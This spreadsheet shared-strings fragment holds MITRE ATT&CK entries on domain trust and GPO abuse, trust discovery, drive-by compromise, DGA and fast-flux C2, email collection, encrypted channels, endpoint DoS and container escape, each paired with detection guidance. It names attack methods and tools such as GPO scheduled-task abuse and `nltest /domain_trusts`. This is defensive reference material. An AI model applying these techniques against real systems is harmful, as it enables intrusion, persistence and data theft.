  <si>
    <t>Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Monitor for PowerShell commands such as: &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name"&lt;/code&gt;, or &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain&lt;/code&gt;.(Citation: Microsoft - Update or Repair Federated domain)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Active Directory: Active Directory Object Modification, Command: Command Execution</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender</t>
  </si>
  <si>
    <t>T1484.001</t>
  </si>
  <si>
    <t>Domain Policy Modification: Group Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path &lt;code&gt;\\&amp;lt;DOMAIN&amp;gt;\SYSVOL\&amp;lt;DOMAIN&amp;gt;\Policies\&lt;/code&gt;.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) 
Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.
Malicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)
For example, publicly available scripts such as &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
* Event ID 5136 - A directory service object was modified
* Event ID 5137 - A directory service object was created
* Event ID 5138 - A directory service object was undeleted
* Event ID 5139 - A directory service object was moved
* Event ID 5141 - A directory service object was deleted
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom; Tristan Bennett, Seamless Intelligence</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1482</t>
  </si>
  <si>
    <t>17 September 2020</t>
  </si>
  <si>
    <t xml:space="preserve">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such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>Dave Westgard; Elia Florio, Microsoft; Mnemonic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist, including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.
* Malicious ads are paid for and served through legitimate ad providers.
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1189</t>
  </si>
  <si>
    <t>Initial Access</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser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</si>
  <si>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Linux, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)</t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568</t>
  </si>
  <si>
    <t>10 March 2020</t>
  </si>
  <si>
    <t>Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Chris Roffe</t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>Dynamic Resolution: DNS Calculation</t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/003</t>
  </si>
  <si>
    <t>11 March 2020</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>Dynamic Resolution: Domain Generation Algorithms</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/002</t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)</t>
  </si>
  <si>
    <t>Barry Shteiman, Exabeam; Ryan Benson, Exabeam; Sylvain Gil, Exabeam</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Dynamic Resolution: Fast Flux DNS</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <t>In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114</t>
  </si>
  <si>
    <t>There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Monitor processes and command-line arguments for actions that could be taken to gather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&lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt;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&lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1114.003</t>
  </si>
  <si>
    <t>Email Collection: Email Forwarding Rule</t>
  </si>
  <si>
    <t>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Outlook and Outlook Web App (OWA) allow users to create inbox rules for various email functions, including forwarding to a different recipient. Similarly, Google Workspace users or administrators can set up mail forwarding rules via the Google Workspace web interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) 
Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/003</t>
  </si>
  <si>
    <t>19 February 2020</t>
  </si>
  <si>
    <t>Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content</t>
  </si>
  <si>
    <t>T1114.001</t>
  </si>
  <si>
    <t>Email Collection: Local Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\&lt;username&gt;\Documents\Outlook Files` or `C:\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files.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</si>
  <si>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T1114.002</t>
  </si>
  <si>
    <t>Email Collection: Remote Email Collection</t>
  </si>
  <si>
    <t>Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1114/002</t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573</t>
  </si>
  <si>
    <t>16 March 2020</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)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</si>
  <si>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T1573.002</t>
  </si>
  <si>
    <t>Encrypted Channel: Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>Encrypted Channel: Symmetric Cryptography</t>
  </si>
  <si>
    <t>Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/001</t>
  </si>
  <si>
    <t>With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.
In general,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</si>
  <si>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T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform DoS attacks against endpoint resources,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Botnets are commonly used to conduct DDoS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DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
In cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)
For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499</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</si>
  <si>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
Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/003</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</si>
  <si>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
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Application or System Exploitation</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/004</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target the operating system (OS) for a DoS attack, since the (OS) is responsible for managing the finite resources on a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity.
Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)
ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/001</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Endpoint Denial of Service: Service Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>T1611</t>
  </si>
  <si>
    <t>Escape to Host</t>
  </si>
  <si>
    <t>Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, and utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
